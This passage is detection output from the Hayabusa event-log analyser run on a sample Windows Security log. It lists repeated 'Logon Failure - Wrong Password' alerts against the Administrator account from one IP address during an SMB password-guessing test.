NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: 